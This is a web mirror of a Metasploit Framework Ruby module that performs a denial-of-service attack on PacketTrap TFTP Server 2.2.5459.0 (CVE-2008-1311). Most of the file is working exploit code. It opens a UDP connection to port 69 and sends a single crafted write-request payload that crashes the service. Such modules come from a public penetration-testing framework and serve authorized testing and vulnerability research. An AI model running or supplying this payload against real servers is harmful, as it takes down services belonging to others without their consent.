Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/windows/tftp/pt360_write.rb
21549 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::Udp
8
include Msf::Auxiliary::Dos
9
10
def initialize(info = {})
11
super(
12
update_info(
13
info,
14
'Name' => 'PacketTrap TFTP Server 2.2.5459.0 DoS',
15
'Description' => %q{
16
The PacketTrap TFTP server version 2.2.5459.0 can be
17
brought down by sending a special write request.
18
},
19
'Author' => 'kris katterjohn',
20
'License' => MSF_LICENSE,
21
'References' => [
22
[ 'CVE', '2008-1311'],
23
[ 'OSVDB', '42932'],
24
[ 'EDB', '6863']
25
],
26
'DisclosureDate' => '2008-10-29',
27
'Notes' => {
28
'Stability' => [CRASH_SERVICE_DOWN],
29
'SideEffects' => [],
30
'Reliability' => []
31
}
32
)
33
)
34
35
register_options([Opt::RPORT(69)])
36
end
37
38
def run
39
connect_udp
40
print_status('Sending write request...')
41
udp_sock.put("\x00\x02|\x00netascii\x00")
42
disconnect_udp
43
end
44
end
45
46